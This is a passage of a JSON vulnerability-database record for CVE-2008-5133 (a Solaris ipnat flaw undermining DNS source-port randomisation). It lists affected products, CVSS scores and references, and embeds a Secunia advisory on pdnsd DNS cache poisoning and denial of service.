            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "bind p4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "gnu/*/linux 2.0-current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openwall",
            "version": null
          },
          {
            "_id": null,
            "model": "bind -p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.7"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "networks self-service wvads",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "secure name server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nixu",
            "version": "1"
          },
          {
            "_id": null,
            "model": "matsumoto ruby pre3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.2"
          },
          {
            "_id": null,
            "model": "windows server web edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "ios 12.2yo",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "river systems linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wind",
            "version": "0"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2.8.7"
          },
          {
            "_id": null,
            "model": "ios 12.4xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "ios 12.2zj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.9"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "software caching name server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nominum",
            "version": "3"
          },
          {
            "_id": null,
            "model": "ios 12.2yl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "rta55i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "hat enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "bind rc1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "ios 12.3xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p72",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.7"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.14"
          },
          {
            "_id": null,
            "model": "coat systems proxyra",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "coat systems proxyra",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "2.3.2.1"
          },
          {
            "_id": null,
            "model": "rtx1000",
            "scope": null,
            "trust": 0.3,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.1.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.7"
          },
          {
            "_id": null,
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ye",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.5"
          },
          {
            "_id": null,
            "model": "networks self-service speech server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "hat enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "_id": null,
            "model": "bind a2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "bind a6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 22",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.5.0a4",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.2"
          },
          {
            "_id": null,
            "model": "1.2-par",
            "scope": null,
            "trust": 0.3,
            "vendor": "pdnsd",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "netbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "coat systems director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2.2.4"
          },
          {
            "_id": null,
            "model": "ios 12.2ym",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks nsna switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4050"
          },
          {
            "_id": null,
            "model": "ios 12.0t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "netware sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rta52i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.11"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.0.02"
          },
          {
            "_id": null,
            "model": "computing sidewinder g2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "6.1.0.02"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.4"
          },
          {
            "_id": null,
            "model": "windows server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.2cz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "ios 12.2zf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.5.0-p2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rtw65b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 13",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "bind p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "0"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 91",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "ios 12.3tpc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.0.01"
          },
          {
            "_id": null,
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "_id": null,
            "model": "netware sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "bind -p2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 64",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "net-dns/dnsmasq",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "2.45"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.3"
          },
          {
            "_id": null,
            "model": "networks junose p0-6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "netware sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "windows professional sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.6"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.16"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.03"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "ios 12.3ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self service voicexml",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.4xy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "cns network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "rt140e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.01"
          },
          {
            "_id": null,
            "model": "windows xp professional sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1.3"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.7"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10.3"
          },
          {
            "_id": null,
            "model": "-par",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pdnsd",
            "version": "1.2.6"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks optical trail manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.4.2-p2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0db",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "5.1.7"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.1.02"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.1.01"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.04"
          },
          {
            "_id": null,
            "model": "ios 12.0dc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.2tpc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p231",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.5"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.1"
          },
          {
            "_id": null,
            "model": "ios 12.2yj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2.7"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.2"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.4"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.0.02"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p21",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.7"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.9"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "BID",
            "id": "30131"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5133"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:sun:opensolaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Dan Kaminsky",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2008-5133",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2008-5133",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2008-5133",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#800113",
                "trust": 0.8,
                "value": "27.54"
              },
              {
                "author": "NVD",
                "id": "CVE-2008-5133",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200811-293",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5133"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "ipnat in IP Filter in Sun Solaris 10 and OpenSolaris before snv_96, when running on a DNS server with Network Address Translation (NAT) configured, improperly changes the source port of a packet when the destination port is the DNS port, which allows remote attackers to bypass an intended CVE-2008-1447 protection mechanism and spoof the responses to DNS queries sent by named. Deficiencies in the DNS protocol and common DNS implementations facilitate DNS cache poisoning attacks. Multiple vendors\u0027 implementations of the DNS protocol are prone to a DNS-spoofing vulnerability because the software fails to securely implement random values when performing DNS queries. \nSuccessfully exploiting this issue allows remote attackers to spoof DNS replies, allowing them to redirect network traffic and to launch man-in-the-middle attacks. \nThis issue affects Microsoft Windows DNS Clients and Servers, ISC BIND 8 and 9, and multiple Cisco IOS releases; other DNS implementations may also be vulnerable. ----------------------------------------------------------------------\n\nDo you need accurate and reliable IDS / IPS / AV detection rules?\n\nGet in-depth vulnerability details:\nhttp://secunia.com/binary_analysis/sample_analysis/\n\n----------------------------------------------------------------------\n\nTITLE:\npdnsd DNS Cache Poisoning and Denial of Service\n\nSECUNIA ADVISORY ID:\nSA31847\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/31847/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\npdnsd 1.x\nhttp://secunia.com/advisories/product/9584/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in pdnsd, which can be\nexploited by malicious people to poison the DNS cache and cause a DoS\n(Denial of Service). \n\n1) A vulnerability is caused due to pdnsd not sufficiently\nrandomising the query port number, which can be exploited to poison\nthe DNS cache. \n\n2) An error exists within the \"p_exec_query()\" function in\nsrc/dns_query.c when processing long replies with many answer\nsections. This can be exploited to e.g. crash the service by sending\na specially crafted reply. \n\nThe vulnerabilities are reported in versions prior to version\n1.2.7-par. \n\nSOLUTION:\nUpdate to version 1.2.7-par. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) Dan Kaminsky, IOActive. \n2) Reported by the vendor. \n\nORIGINAL ADVISORY:\nhttp://www.phys.uu.nl/~rombouts/pdnsd/ChangeLog\n\nOTHER REFERENCES:\nUS-CERT VU#800113:\nhttp://www.kb.cert.org/vuls/id/800113\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2008-5133"
          },
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          },
          {
            "db": "BID",
            "id": "30131"
          },
          {
            "db": "PACKETSTORM",
            "id": "70051"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2008-5133",
            "trust": 2.7
          },
          {
            "db": "SECUNIA",
            "id": "32625",
            "trust": 2.4
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-3129",
            "trust": 2.4
          },
          {
            "db": "CERT/CC",
            "id": "VU#800113",
            "trust": 1.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971",
            "trust": 0.8
          },
          {
            "db": "SUNALERT",
            "id": "245206",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "30131",
            "trust": 0.3
          },
          {
            "db": "SECUNIA",
            "id": "31847",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "70051",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "BID",
            "id": "30131"
          },
          {
            "db": "PACKETSTORM",
            "id": "70051"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5133"
          }
        ]
      },
      "id": "VAR-200807-0659",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.38072691000000003
      },
      "last_update_date": "2026-03-09T21:24:34.870000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "245206",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-245206-1"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-264",
            "trust": 1.8
          },
          {
            "problemtype": "CWE-Other",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5133"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.4,
            "url": "http://secunia.com/advisories/32625"
          },
          {
